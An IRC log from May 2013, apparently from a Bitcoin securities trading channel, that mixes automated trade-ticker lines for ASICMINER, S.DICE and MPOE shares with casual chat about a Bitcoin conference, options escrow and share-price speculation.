23:54:24 yeah. May 17 23:54:38 i spend so much time in the dark in the cold. May 17 23:54:41 in the rain. May 17 23:54:49 he was at my conference, we talked abnout it... May 17 23:55:01 and he is on this chan. May 17 23:55:09 super May 17 23:55:22 lol poor josh May 17 23:55:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.01849 = 0.0555 BTC [+] May 17 23:56:02 [HAVELOCK] [ASICM] 4 @ 0.0186 = 0.0744 BTC [+] May 17 23:56:03 it's probably beeter that i don't know who people are or give a shit May 17 23:56:24 y ? May 17 23:56:41 possible fixation May 17 23:56:58 i'm easily distracted May 17 23:57:17 so the bitcoin conference started today? May 17 23:58:01 mtgox has namecoin in their api too i did not know this..they must be at least slightly interested in the alt coins May 17 23:59:02 ofc: Will Bitcoin be able to scale in the face of exponential growth? Mike answered "yes" and without the need for "Bitcoin banks" or supernodes. May 18 00:00:13 we don't need nobody May 18 00:00:15 That lemon thing looks neat May 18 00:00:43 But I find it annoying to have so many apps/options May 18 00:01:15 Plus cards are easier to manage I say... nothing wrong in a physical wallet May 18 00:01:34 live balances is a cool feature tho... May 18 00:02:00 Namworld his idea was mostly for noobs/old people May 18 00:02:52 I'll wait till all cards are microcomputers and show live balances directly on them lol May 18 00:06:53 [MPEX] [S.MPOE] 2179 @ 0.00067323 = 1.467 BTC [+] May 18 00:06:55 [MPEX] [S.MPOE] 5221 @ 0.00067326 = 3.5151 BTC [+] May 18 00:07:23 [BTCTC] [TAT.ASICMINER] 19 @ 0.01849 = 0.3513 BTC [+] May 18 00:07:49 [BTCTC] [COGNITIVE] 1 @ 0.23 BTC [+] May 18 00:10:34 wtf did someone say it was okay for gribble to take off on a friday like this? he doesnt even know whats going on in the market May 18 00:11:16 [BTCTC] [ASICMINER-PT] 10 @ 1.87995 = 18.7995 BTC [+] May 18 00:11:20 [BTCTC] [ASICMINER-PT] 15 @ 1.87995 = 28.1993 BTC [+] May 18 00:11:52 [BTCTC] [ASICMINER-PT] 18 @ 1.87998 = 33.8396 BTC [+] May 18 00:12:07 [BTCTC] [ASICMINER-PT] 11 @ 1.879999 = 20.68 BTC [+] May 18 00:12:15 [BTCTC] [COGNITIVE] 1 @ 0.234996 BTC [+] May 18 00:15:12 [BTCTC] [ASICMINER-PT] 8 @ 1.88 = 15.04 BTC [+] May 18 00:15:41 [BTCTC] [ASICMINER-PT] 3 @ 1.889 = 5.667 BTC [+] May 18 00:17:18 [BTCTC] [ASICMINER-PT] 3 @ 1.89 = 5.67 BTC [+] May 18 00:20:47 sorry, gribble went to san jose May 18 00:31:56 [BTCTC] [TAT.ASICMINER] 20 @ 0.01849 = 0.3698 BTC [+] May 18 00:35:17 [BTCTC] [ASICMINER-PT] 1 @ 1.89 BTC [+] May 18 00:36:03 [HAVELOCK] [ASICM] 400 @ 0.01865 = 7.46 BTC [+] May 18 00:37:56 [BTCTC] [ASICMINER-PT] 1 @ 1.89 BTC [+] May 18 00:41:00 wtf he cant go to san jose..who is gonna cover for him May 18 00:42:02 [HAVELOCK] [HIM] 1 @ 2.0398 BTC [-] May 18 00:43:09 SDICE Profit This Month: -1298.65012061 BTC (so far) :/ May 18 00:45:08 haha srlsy ? May 18 00:45:13 de-U.S.-ing has it's short term costs May 18 00:45:32 its May 18 00:45:33 [BTCTC] [ASICMINER-PT] 1 @ 1.8802 BTC [-] May 18 00:45:53 [BTCTC] [ASICMINER-PT] 5 @ 1.88 = 9.4 BTC [-] May 18 00:45:54 [BTCTC] [TAT.ASICMINER] 50 @ 0.01849 = 0.9245 BTC [+] May 18 00:46:02 [HAVELOCK] [HIM] 1 @ 2.0399 BTC [+] May 18 00:46:14 [BTCTC] [TAT.ASICMINER] 19 @ 0.01849 = 0.3513 BTC [+] May 18 00:46:39 [BTCTC] [ASICMINER-PT] 1 @ 1.8802 BTC [+] May 18 00:49:10 [MPEX] [S.MPOE] 3003 @ 0.00067319 = 2.0216 BTC [-] May 18 00:49:10 [BTCTC] [TAT.ASICMINER] 58 @ 0.01855 = 1.0759 BTC [+] May 18 00:53:24 WTB ASICMINER Shares in Bulk May 18 00:54:36 [BTCTC] [ASICMINER-PT] 1 @ 1.899 BTC [+] May 18 00:55:12 [BTCTC] [S.DICE-PT] 50 @ 0.002589 = 0.1295 BTC [+] May 18 00:55:57 [BTCTC] [TAT.ASICMINER] 21 @ 0.0186 = 0.3906 BTC [+] May 18 00:56:46 It feels like SDICE hasn't been expanding like it should have been.. and now, it's contracting a bit May 18 00:58:16 I mean, using only the bitcoin network is great and all, but they left a bunch of money on the table there. At the least they should have been collecting some user data for return calls to action May 18 00:59:09 parseval, marketing, communication, and development are not needed for successful business May 18 00:59:15 or so I've been told May 18 01:00:06 lol May 18 01:00:46 where were you yesterday when I needed you! May 18 01:01:09 [BTCTC] [ASICMINER-PT] 5 @ 1.899999 = 9.5 BTC [+] May 18 01:01:39 Probably sleeping May 18 01:01:48 Speaking of which, my workday's done. Be back on in a bit May 18 01:02:03 [HAVELOCK] [ASICM] 9 @ 0.01885 = 0.1697 BTC [+] May 18 01:05:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.0186 BTC [+] May 18 01:06:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.0186 = 0.0372 BTC [+] May 18 01:06:15 [MPEX] [S.MPOE] 4321 @ 0.00066603 = 2.8779 BTC [-] May 18 01:06:17 [MPEX] [S.MPOE] 14279 @ 0.00066578 = 9.5067 BTC [-] May 18 01:08:55 [BTCTC] [GSDPT] 10 @ 0.00279 = 0.0279 BTC [+] May 18 01:10:16 [BTCTC] [GSDPT] 4 @ 0.00279 = 0.0112 BTC [+] May 18 01:10:59 [BTCTC] [COGNITIVE] 1 @ 0.234998 BTC [+] May 18 01:12:46 [BTCTC] [GSDPT] 6 @ 0.00279 = 0.0167 BTC [+] May 18 01:14:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.0186 = 0.0744 BTC [+] May 18 01:17:32 [BTCTC] [BTC-BOND] 1 @ 0.010098 BTC [+] May 18 01:18:16 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2179 BTC [+] May 18 01:19:53 [BTCTC] [B.YABMC] 1 @ 0.0169 BTC [-] May 18 01:22:05 [BTCTC] [ASICMINER-PT] 2 @ 1.899999 = 3.8 BTC [+] May 18 01:23:32 [BTCTC] [BITVPS] 1 @ 0.0007 BTC [+] May 18 01:23:52 [BTCTC] [ASICMINER-PT] 5 @ 1.75 = 8.75 BTC [-] May 18 01:30:03 [HAVELOCK] [ASICM] 26 @ 0.01885 = 0.4901 BTC [+] May 18 01:31:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.018738 BTC [+] May 18 01:31:54 [BTCTC] [ASICMINER-PT] 3 @ 1.899999 = 5.7 BTC [+] May 18 01:32:02 [HAVELOCK] [ASICM] 100 @ 0.01885 = 1.885 BTC [+] May 18 01:33:02 [HAVELOCK] [ASICM] 200 @ 0.01889 = 3.778 BTC [+] May 18 01:33:04 [HAVELOCK] [ASICM] 204 @ 0.01885 = 3.8454 BTC [-] May 18 01:33:51 [BTCTC] [TAT.ASICMINER] 50 @ 0.018738 = 0.9369 BTC [+] May 18 01:34:02 [MPEX] [S.MPOE] 7347 @ 0.00066825 = 4.9096 BTC [+] May 18 01:34:03 [HAVELOCK] [ASICM] 130 @ 0.01885 = 2.4505 BTC [-] May 18 01:34:04 [HAVELOCK] [ASICM] 17 @ 0.01885 = 0.3205 BTC [-] May 18 01:34:06 [HAVELOCK] [ASICM] 53 @ 0.01885 = 0.9991 BTC [-] May 18 01:35:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.018738 = 0.0562 BTC [+] May 18 01:38:13 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1915 BTC [+] May 18 01:39:39 [BTCTC] [RSM] 1 @ 0.01899 BTC [+] May 18 01:39:43 [BTCTC] [RSM] 1 @ 0.01899 BTC [+] May 18 01:39:47 [BTCTC] [RSM] 6 @ 0.019 = 0.114 BTC [+] May 18 01:41:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.018738 = 0.0375 BTC [+] May 18 01:42:02 [HAVELOCK] [ASICM] 147 @ 0.01885 = 2.771 BTC [-] May 18 01:44:35 [BTCTC] [ASICMINER-PT] 1 @ 1.899999 BTC [+] May 18 01:44:59 [BTCTC] [TAT.ASICMINER] 10 @ 0.018738 = 0.1874 BTC [+] May 18 01:47:30 [MPEX] [S.MPOE] 2903 @ 0.00067236 = 1.9519 BTC [+] May 18 01:50:40 [BTCTC] [ESECURITYSABTC] 3 @ 0.183601 = 0.5508 BTC [-] May 18 01:52:14 [BTCTC] [ASICMINER-PT] 2 @ 1.899999 = 3.8 BTC [+] May 18 01:53:02 [HAVELOCK] [ASICM] 200 @ 0.01889 = 3.778 BTC [+] May 18 01:53:04 [HAVELOCK] [ASICM] 300 @ 0.0189 = 5.67 BTC [+] May 18 01:53:05 [HAVELOCK] [ASICM] 150 @ 0.019 = 2.85 BTC [+] May 18 01:54:19 [BTCTC] [ASICMINER-PT] 2 @ 1.899999 = 3.8 BTC [+] May 18 01:56:02 [HAVELOCK] [ASICM] 50 @ 0.01905 = 0.9525 BTC [+] May 18 01:56:03 [HAVELOCK] [ASICM] 100 @ 0.0191 = 1.91 BTC [+] May 18 01:56:05 [HAVELOCK] [ASICM] 250 @ 0.019145 = 4.7863 BTC [+] May 18 01:56:08 [BTCTC] [TAT.ASICMINER] 34 @ 0.018738 = 0.6371 BTC [+] May 18 01:56:46 [BTCTC] [ASICMINER-PT] 3 @ 1.899999 = 5.7 BTC [+] May 18 01:58:02 [HAVELOCK] [ASICM] 2 @ 0.01915 = 0.0383 BTC [+] May 18 01:59:07 [BTCTC] [ASICMINER-PT] 1 @ 1.899999 BTC [+] May 18 02:02:03 [HAVELOCK] [ASICM] 400 @ 0.0189 = 7.56 BTC [-] May 18 02:02:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.018798 = 0.188 BTC [+] May 18 02:02:22 [BTCTC] [ASICMINER-PT] 1 @ 1.881 BTC [-] May 18 02:03:58 [BTCTC] [ASICMINER-PT] 2 @ 1.899999 = 3.8 BTC [+] May 18 02:04:03 [HAVELOCK] [ASICM] 451 @ 0.01890001 = 8.5239 BTC [+] May 18 02:04:04 [HAVELOCK] [ASICM] 25 @ 0.0189 = 0.4725 BTC [-] May 18 02:04:04 [HAVELOCK] [ASICM] 500 @ 0.0189 = 9.45 BTC [-] May 18 02:04:06 [HAVELOCK] [ASICM] 200 @ 0.01889 = 3.778 BTC [-] May 18 02:04:07 [HAVELOCK] [ASICM] 424 @ 0.0188 = 7.9712 BTC [-] May 18 02:04:45 [BTCTC] [TAT.ASICMINER] 42 @ 0.018798 = 0.7895 BTC [+] May 18 02:05:02 [HAVELOCK] [ASICM] 22 @ 0.019 = 0.418 BTC [+] May 18 02:06:42 [BTCTC] [ASICMINER-PT] 3 @ 1.899999 = 5.7 BTC [+] May 18 02:08:02 [HAVELOCK] [ASICM] 20 @ 0.01899999 = 0.38 BTC [-] May 18 02:09:17 hi all May 18 02:09:19 whats up May 18 02:09:27 [BTCTC] [ASICMINER-PT] 1 @ 1.899999 BTC [+] May 18 02:10:12 at the conference May 18 02:10:32 is it awesome? May 18 02:10:35 or lolsome? May 18 02:10:42 hasn't really started May 18 02:10:48 just hung out with erik a bit May 18 02:10:52 saw some of the nyc guys May 18 02:10:56 cool May 18 02:11:12 lol May 18 02:11:14 i suppose May 18 02:11:24 that is the point of conferences May 18 02:11:26 i think May 18 02:12:07 conferences are also good to foster cultism/fanboism May 18 02:12:25 [MPEX] [S.MPOE] 4321 @ 0.00066579 = 2.8769 BTC [-] May 18 02:12:27 [MPEX] [S.MPOE] 6779 @ 0.00066578 = 4.5133 BTC [-] May 18 02:12:35 too many i bet May 18 02:12:45 [BTCTC] [TAT.ASICMINER] 18 @ 0.018798 = 0.3384 BTC [+] May 18 02:13:17 about to hit 1.9 May 18 02:14:46 well maybe the 7.5 noob had it May 18 02:14:58 hehe May 18 02:16:34 50 shares @ 1.9, then next ask is at 1.949 May 18 02:16:54 :/ May 18 02:18:07 [HAVELOCK] [ASICM] 427 @ 0.01899999 = 8.113 BTC [-] May 18 02:18:42 [BTCTC] [ASICMINER-PT] 2 @ 1.9 = 3.8 BTC [+] May 18 02:19:13 it's still payout 2.5% per month at 3BTC May 18 02:19:19 it'd May 18 02:19:49 ok May 18 02:20:29 heya mircea_popescu May 18 02:20:50 hey May 18 02:21:03 [HAVELOCK] [SDICE] 4 @ 0.2487 = 0.9948 BTC [+] May 18 02:21:05 [BTCTC] [TAT.ASICMINER] 9 @ 0.01882 = 0.1694 BTC [+] May 18 02:21:50 so far this conference sucks compared to romania May 18 02:22:10 no supernodes yet ? May 18 02:22:21 hehehe May 18 02:22:27 haven't seen one yet May 18 02:24:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.01882 BTC [+] May 18 02:24:51 hi May 18 02:25:01 hi May 18 02:25:01 hi May 18 02:25:03 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 18 02:25:38 damn, I hjave so many users logged in so many places May 18 02:25:48 i'm mjr by the way May 18 02:25:54 [BTCTC] [B.YABMC] 1 @ 0.0169 BTC [-] May 18 02:25:57 yes, i know May 18 02:26:06 buttonwodd, etc... May 18 02:26:23 how was monday btw ? May 18 02:26:28 [BTCTC] [TAT.ASICMINER] 17 @ 0.01882 = 0.3199 BTC [+] May 18 02:27:52 [BTCTC] [CRYPTO-TRADE] 8 @ 0.191 = 1.528 BTC [-] May 18 02:28:10 [BTCTC] [CRYPTO-TRADE] 1 @ 0.191 BTC [-] May 18 02:28:22 it went well May 18 02:28:26 some trading May 18 02:28:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.018798 = 0.1316 BTC [-] May 18 02:28:33 [BTCTC] [ESECURITYSABTC] 1 @ 0.22301 BTC [+] May 18 02:30:04 [MPEX] [S.MPOE] 4321 @ 0.00067325 = 2.9091 BTC [+] May 18 02:32:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.01898 = 0.3796 BTC [+] May 18 02:33:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.018798 = 0.0376 BTC [-] May 18 02:37:11 [BTCTC] [PAJKA.BOND] 1 @ 0.1049 BTC [-] May 18 02:37:40 I think I need to work on those charts a bit more, people seem to like them May 18 02:38:16 [BTCTC] [TAT.ASICMINER] 15 @ 0.018798 = 0.282 BTC [-] May 18 02:39:12 they are pretty decent May 18 02:40:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.01874 = 0.0375 BTC [-] May 18 02:41:23 I still need to add in flags for the dividends, and maybe make up some candlestick charts. Oh, and a USD->BTC comparison May 18 02:42:44 Maybe something combining %pricechange and volume so we can visualize velocity a bit better May 18 02:42:49 [MPEX] [S.MPOE] 7700 @ 0.00067403 = 5.19 BTC [+] May 18 02:42:51 [MPEX] [S.MPOE] 2811 @ 0.00067458 = 1.8962 BTC [+] May 18 02:43:43 parseval which charts are those ? May 18 02:43:53 highstock May 18 02:44:03 fnords.dontexist.com May 18 02:44:04 https://bitcointalk.org/index.php?topic=208630.0 lol gotta love these people May 18 02:44:12 "my shit sucks so you gotta adjust the world nao" May 18 02:44:21 then you wonder how obamas get voted into office. May 18 02:44:30 "plz vote for me i shall adjust difficulty!!!" May 18 02:44:50 yeah like..was obama the best we could come up with? May 18 02:44:54 That guy should move to litecoin instead, no asics yet May 18 02:44:56 o hey, those charts ARE cool. May 18 02:45:07 we must look like a bunch of chumps to the rest of the world May 18 02:45:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.018798 = 0.0376 BTC [+] May 18 02:45:57 Thank you May 18 02:46:42 [BTCTC] [TAT.ASICMINER] 23 @ 0.01898 = 0.4365 BTC [+] May 18 02:47:02 [BTCTC] [ASICMINER-PT] 1 @ 1.9 BTC [+] May 18 02:49:50 "Just stop mining, so the difficulty will go down and it will be more profitable for me. Grin May 18 02:52:02 [HAVELOCK] [ASICM] 53 @ 0.01899999 = 1.007 BTC [-] May 18 02:52:04 [HAVELOCK] [ASICM] 47 @ 0.01899999 = 0.893 BTC [-] May 18 02:54:15 sup mjr May 18 02:56:03 [HAVELOCK] [ASICM] 111 @ 0.01899999 = 2.109 BTC [-] May 18 02:59:13 [BTCTC] [GSDPT] 1 @ 0.00279 BTC [+] May 18 03:02:04 [MPEX] [S.MPOE] 1510 @ 0.00067458 = 1.0186 BTC [+] May 18 03:02:05 [MPEX] [S.MPOE] 4600 @ 0.00067459 = 3.1031 BTC [+] May 18 03:02:20 [MPEX] [S.MPOE] 7700 @ 0.00067998 = 5.2358 BTC [+] May 18 03:04:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.01898 = 0.038 BTC [+] May 18 03:06:03 [HAVELOCK] [SDICE] 4 @ 0.2204 = 0.8816 BTC [-] May 18 03:06:33 [BTCTC] [TAT.ASICMINER] 13 @ 0.01898 = 0.2467 BTC [+] May 18 03:06:38 [BTCTC] [GSDPT] 2 @ 0.00279 = 0.0056 BTC [+] May 18 03:07:06 [BTCTC] [ASICMINER-PT] 1 @ 1.9 BTC [+] May 18 03:07:14 [BTCTC] [ASICMINER-PT] 1 @ 1.9 BTC [+] May 18 03:10:45 [BTCTC] [BITVPS] 144 @ 0.0007 = 0.1008 BTC [+] May 18 03:11:02 [HAVELOCK] [ASICM] 2 @ 0.01866 = 0.0373 BTC [-] May 18 03:11:21 [BTCTC] [S.MPOE-PT] 1 @ 0.000666 BTC [+] May 18 03:13:12 [BTCTC] [S.MPOE-PT] 10 @ 0.000666 = 0.0067 BTC [+] May 18 03:22:03 [HAVELOCK] [ASICM] 5 @ 0.01899999 = 0.095 BTC [+] May 18 03:22:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.01898 = 0.038 BTC [+] May 18 03:23:10 [BTCTC] [TAT.ASICMINER] 30 @ 0.01898 = 0.5694 BTC [+] May 18 03:23:36 [BTCTC] [TAT.ASICMINER] 25 @ 0.01898 = 0.4745 BTC [+] May 18 03:23:42 [BTCTC] [TAT.ASICMINER] 100 @ 0.01899 = 1.899 BTC [+] May 18 03:24:31 [BTCTC] [TAT.ASICMINER] 30 @ 0.019 = 0.57 BTC [+] May 18 03:24:40 !t h asicm May 18 03:24:41 [HAVELOCK:ASICM] 1D: 0.01751000 / 0.01823021 / 0.01915000 (20897 shares, 380.95668561 BTC), 7D: 0.01455000 / 0.01719326 / 0.01999999 (71158 shares, 1223.43803393 BTC), 30D: 0.01290000 / 0.01640911 / 0.02820000 (104098 shares, 1708.15590084 BTC) May 18 03:25:16 [BTCTC] [TAT.ASICMINER] 13 @ 0.019 = 0.247 BTC [+] May 18 03:25:50 !t h him May 18 03:25:51 [HAVELOCK:HIM] 1D: 1.90000000 / 1.91737658 / 2.03990000 (38 shares, 72.86031000 BTC), 7D: 1.90000000 / 2.10242554 / 2.48990000 (157 shares, 330.08081000 BTC), 30D: 1.44000000 / 1.94166161 / 2.48990000 (570 shares, 1106.74711546 BTC) May 18 03:32:03 [HAVELOCK] [ASICM] 61 @ 0.01899999 = 1.159 BTC [+] May 18 03:32:28 [BTCTC] [ESECURITYSABTC] 1 @ 0.23194 BTC [+] May 18 03:35:02 [HAVELOCK] [ASICM] 31 @ 0.01899999 = 0.589 BTC [+] May 18 03:37:52 [BTCTC] [ASICMINER-PT] 3 @ 1.899512 = 5.6985 BTC [-] May 18 03:38:14 [BTCTC] [ASICMINER-PT] 2 @ 1.9 = 3.8 BTC [+] May 18 03:39:31 [BTCTC] [ASICMINER-PT] 10 @ 1.9 = 19 BTC [+] May 18 03:40:03 [HAVELOCK] [ASICM] 65 @ 0.01899999 = 1.235 BTC [+] May 18 03:40:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.01876 = 0.1876 BTC [-] May 18 03:41:54 [BTCTC] [ASICMINER-PT] 1 @ 1.9 BTC [+] May 18 03:42:08 [BTCTC] [TAT.ASICMINER] 5 @ 0.01876 = 0.0938 BTC [-] May 18 03:50:03 [BTCTC] [ASICMINER-PT] 2 @ 1.9 = 3.8 BTC [+] May 18 03:52:42 [BTCTC] [TAT.ASICMINER] 36 @ 0.019 = 0.684 BTC [+] May 18 03:53:10 [BTCTC] [GSDPT] 56 @ 0.002561 = 0.1434 BTC [-] May 18 03:54:15 [BTCTC] [ESECURITYSABTC] 1 @ 0.219998 BTC [-] May 18 03:54:30 [BTCTC] [ESECURITYSABTC] 1 @ 0.22 BTC [+] May 18 03:54:48 [BTCTC] [ESECURITYSABTC] 1 @ 0.22999 BTC [+] May 18 03:57:03 [HAVELOCK] [HIM] 1 @ 1.9001 BTC [-] **** BEGIN LOGGING AT Sat May 18 10:20:28 2013 May 18 10:20:31 ;;ticker May 18 10:20:32 BTCUSD ticker | Best bid: 123.10000, Best ask: 123.19999, Bid-ask spread: 0.09999, Last trade: 123.10000, 24 hour volume: 83831.47932605, 24 hour low: 116.77000, 24 hour high: 125.55550, 24 hour vwap: 122.17715 May 18 10:21:02 [BTCTC] [TAT.ASICMINER] 29 @ 0.019652 = 0.5699 BTC [+] May 18 10:24:56 Morning, MP. May 18 10:26:39 3btc a share, here we come :/ May 18 10:27:27 alloh May 18 10:28:07 BitHub but why the sad face ? redditvestors have decided they must have more punishment. May 18 10:28:38 not sad, just concerned :) May 18 10:28:58 [BTCTC] [TAT.ASICMINER] 55 @ 0.019896 = 1.0943 BTC [+] May 18 10:30:17 Someone picked up 5 call options at strike ฿2.7 at BTCT during the night. Crazy times. May 18 10:30:49 Before that, there were three @2.1 with ~฿0.5 premiums. May 18 10:31:47 lmao May 18 10:31:50 There are five puts for sale @1.75 with 0.15 premium. Balls is fine, this is just madness. May 18 10:32:16 exactly how do btct options work ? May 18 10:32:30 does someone selling a call at 2.7 own what exactly ? May 18 10:33:29 They own a share, sell an option to someone who can then buy that share at 2.7. For that, the buyer pays, in this case, 0.1, effectively paying 2.8 per share. May 18 10:33:47 [BTCTC] [ASICMINER-PT] 1 @ 2.03999 BTC [+] May 18 10:34:23 Buyer wins if price exceeds 2.8 over the next X days. Didn't see how long, though, but the put I mentioned at 1.75 is on 28 days. May 18 10:35:08 is that share locked then ? May 18 10:35:13 Yup. May 18 10:35:31 and if someone offers a put at 1.75 is there 1.75 btc locked out of his account ? May 18 10:35:32 Am now worth more than $100,000,000 and dont forget about all the dividends paid out :) May 18 10:35:36 For calls is is locked. For puts, you have to put up escrow for full amount. May 18 10:35:40 Yup. May 18 10:35:42 Am = asic miner May 18 10:36:14 do you think we'll get to 3btc in a few weeks chaang? May 18 10:36:20 no May 18 10:36:23 or back to 1.5 May 18 10:36:28 awww why not. May 18 10:36:38 If there is any sanity in this market, 2.5 is far more likely. May 18 10:36:38 not unless the 200th is being deployed pretty damn quick May 18 10:36:59 i was thinking it would get to 2.5 before choking May 18 10:37:03 i could see 2.5 helpp we might get 3, people paided crazy prices for s.dice May 18 10:37:09 Doesn't matter if they deploy 200. They can't really grow much more without killing Bitcoin. May 18 10:37:20 killing btc? looool May 18 10:37:27 If there is any sanity in this market, 2.5 is far more likely. Yeah, killing by exceeding 51%. May 18 10:37:47 you realize they are selling units? May 18 10:37:51 3btc is supportable May 18 10:37:58 is the selling units a ongoing thing from now on? May 18 10:38:05 yeah but in a few weeks, i dont know May 18 10:38:12 cool, check May 18 10:38:29 yes they are selling units, just email him how many you want May 18 10:38:36 plus they still got over 600btc worth of orders and that's only 1 group buy May 18 10:38:37 also 10,000 usb units soon May 18 10:38:48 they are selling the blades too May 18 10:38:57 [MPEX] [S.MPOE] 8983 @ 0.0006965 = 6.2567 BTC [-] May 18 10:38:59 [MPEX] [S.MPOE] 1602 @ 0.00069844 = 1.1189 BTC [+] May 18 10:39:02 so potentially 20,000 btc for the usb's May 18 10:39:13 and 50btc each for the blades May 18 10:39:14 some of that will be costs, butyeah May 18 10:39:25 if they do that for a month i think 3btc seems very doable May 18 10:40:34 yeah May 18 10:40:37 good times for sure May 18 10:41:02 [HAVELOCK] [VTX] 20 @ 0.41 = 8.2 BTC [-] May 18 10:41:04 [HAVELOCK] [VTX] 1 @ 0.4097 BTC [-] May 18 10:41:05 [HAVELOCK] [VTX] 6 @ 0.4096 = 2.4576 BTC [-] May 18 10:41:32 https://www.eff.org/deeplinks/2013/05/eff-will-accept-bitcoins-support-digital-liberty May 18 10:41:35 i get very paranoid when everyone is saying shit like that May 18 10:42:16 "Be fearful when others are greedy and be greedy when others are fearful" May 18 10:42:17 yeah May 18 10:42:26 im slowly selling May 18 10:42:37 Thirs time I'm saying that in a couple of days. Have to remind myself. I'm freaking out right now. May 18 10:42:40 [BTCTC] [ASICMINER-PT] 1 @ 2.03999 BTC [+] i sold that May 18 10:42:57 EFF wants your bitcoin but 'does not endorse' May 18 10:43:05 assholes May 18 10:43:08 They don't endorse US dollars either. May 18 10:43:16 They still want it. May 18 10:43:55 ThickAsThieves that's ok, we don't endorse them either. May 18 10:46:55 [BTCTC] [BASIC-MINING] 2 @ 0.49 = 0.98 BTC [+] May 18 10:47:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.019896 = 0.0796 BTC [+] May 18 10:52:52 [MPEX] [S.MPOE] 1998 @ 0.00069844 = 1.3955 BTC [+] May 18 10:52:54 [MPEX] [S.MPOE] 4400 @ 0.00070013 = 3.0806 BTC [+] May 18 10:53:01 [BTCTC] [BTC-BOND] 4 @ 0.010098 = 0.0404 BTC [+] May 18 10:53:03 [MPEX] [S.MPOE] 7500 @ 0.00070014 = 5.2511 BTC [+] May 18 10:53:07 [MPEX] [S.MPOE] 1852 @ 0.00070057 = 1.2975 BTC [+] May 18 10:59:01 [HAVELOCK] [ASICM] 1 @ 0.02000001 BTC [-] May 18 10:59:03 [HAVELOCK] [ASICM] 50 @ 0.02 = 1 BTC [-] May 18 10:59:04 [HAVELOCK] [ASICM] 300 @ 0.01997 = 5.991 BTC [-] May 18 10:59:05 [HAVELOCK] [ASICM] 23 @ 0.019966 = 0.4592 BTC [-] May 18 11:04:01 [BTCTC] [TAT.ASICMINER] 20 @ 0.019896 = 0.3979 BTC [+] May 18 11:06:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.019896 BTC [+] May 18 11:09:05 [BTCTC] [ASICMINER-PT] 1 @ 2.010001 BTC [-] May 18 11:09:39 [BTCTC] [ASICMINER-PT] 7 @ 2.01 = 14.07 BTC [-] May 18 11:12:01 [HAVELOCK] [ASICM] 300 @ 0.019678 = 5.9034 BTC [-] May 18 11:12:02 [HAVELOCK] [ASICM] 1 @ 0.019677 BTC [-] May 18 11:12:04 [HAVELOCK] [ASICM] 599 @ 0.01967 = 11.7823 BTC [-] May 18 11:16:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.01979 BTC [-] May 18 11:24:02 [HAVELOCK] [ASICM] 1 @ 0.020111 BTC [+] May 18 11:26:06 [MPEX] [S.MPOE] 5900 @ 0.00070046 = 4.1327 BTC [-] May 18 11:26:07 [MPEX] [S.MPOE] 10400 @ 0.00070057 = 7.2859 BTC [+] May 18 11:27:10 [BTCTC] [ASICMINER-PT] 1 @ 2.039989 BTC [+] May 18 11:28:13 [BTCTC] [ASICMINER-PT] 4 @ 2.03999 = 8.16 BTC [+] May 18 11:29:06 [BTCTC] [ASICMINER-PT] 1 @ 2.03999 BTC [+] May 18 11:30:54 [BTCTC] [TAT.ASICMINER] 60 @ 0.01979 = 1.1874 BTC [-] May 18 11:31:06 [BTCTC] [ASICMINER-PT] 1 @ 2.03999 BTC [+] May 18 11:32:51 [BTCTC] [TAT.ASICMINER] 43 @ 0.01979 = 0.851 BTC [-] May 18 11:33:21 [BTCTC] [TAT.ASICMINER] 15 @ 0.01979 = 0.2969 BTC [-] May 18 11:34:20 [BTCTC] [ASICMINER-PT] 7 @ 2.03999 = 14.2799 BTC [+] May 18 11:34:51 [BTCTC] [S.DICE-PT] 1 @ 0.0028 BTC [+] May 18 11:34:56 [BTCTC] [ASICMINER-PT] 1 @ 2.03999 BTC [+] May 18 11:39:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.01979 = 0.0594 BTC [-] May 18 11:40:04 [BTCTC] [TAT.ASICMINER] 76 @ 0.01979 = 1.504 BTC [-] May 18 11:45:47 [BTCTC] [ASICMINER-PT] 1 @ 2.03999 BTC [+] May 18 11:47:19 [BTCTC] [ASICMINER-PT] 2 @ 2.03999 = 4.08 BTC [+] May 18 11:48:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.01979 = 0.0396 BTC [-] May 18 11:48:13 Is there any benefit of using Havelock PT shares over TAT.ASICMINER shares? May 18 11:48:19 *buying May 18 11:49:45 not rluy May 18 11:49:50 [MPEX] [S.MPOE] 4562 @ 0.00069951 = 3.1912 BTC [-] May 18 11:49:59 [BTCTC] [S.DICE-PT] 600 @ 0.0028 = 1.68 BTC [+] May 18 11:51:08 [BTCTC] [ASICMINER-PT] 1 @ 2.03999 BTC [+] May 18 11:51:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.01979 = 0.3958 BTC [-] May 18 11:53:19 [BTCTC] [ASICMINER-PT] 6 @ 2.04 = 12.24 BTC [+] May 18 11:53:41 [BTCTC] [ASICMINER-PT] 2 @ 2.04 = 4.08 BTC [+] May 18 11:54:50 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [+] May 18 11:56:02 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [+] May 18 11:57:23 [BTCTC] [TAT.ASICMINER] 75 @ 0.01979 = 1.4843 BTC [-] May 18 11:57:27 Some of my orders seem to complete quicker on Havelock, but maybe that's just because of my price. May 18 12:00:01 [MPEX] [S.MPOE] 3902 @ 0.00070057 = 2.7336 BTC [+] May 18 12:00:02 [MPEX] [S.MPOE] 1900 @ 0.00070122 = 1.3323 BTC [+] May 18 12:00:03 [MPEX] 